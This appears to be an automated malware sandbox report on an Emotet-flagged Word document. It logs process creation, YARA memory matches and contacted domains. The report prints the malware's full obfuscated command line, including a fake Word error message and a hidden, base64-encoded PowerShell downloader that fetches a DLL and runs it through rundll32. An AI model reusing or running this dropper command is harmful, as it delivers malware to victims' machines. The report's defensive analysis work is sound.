Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2094977205.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2112358022.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091794029.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2097666740.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2095245962.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2099840618.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2090614258.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091834475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106091733.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103352962.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103466457.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088248938.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2099966335.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107140273.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2110865769.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109908285.0000000000460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2112047074.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095687942.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2111384488.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149905942.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 17.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.310000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 344134 Sample: N00048481397007.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 11 other signatures 2->58 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 24 2->17         started        process3 signatures4 66 Suspicious powershell command line found 14->66 68 Very long command line found 14->68 70 Encrypted powershell cmdline option found 14->70 19 powershell.exe 16 11 14->19         started        23 msg.exe 14->23         started        process5 dnsIp6 46 traumfrauen-ukraine.de 212.227.200.73, 443, 49168, 49169 ONEANDONE-ASBrauerstrasse48DE Germany 19->46 48 e-wdesign.eu 45.138.97.75, 49167, 80 M247GB Germany 19->48 50 3 other IPs or domains 19->50 44 C:\Users\user\Lxbfyvkbehaviorgraphcqtr_f\C46T.dll, data 19->44 dropped 25 rundll32.exe 19->25         started        file7 process8 process9 27 rundll32.exe 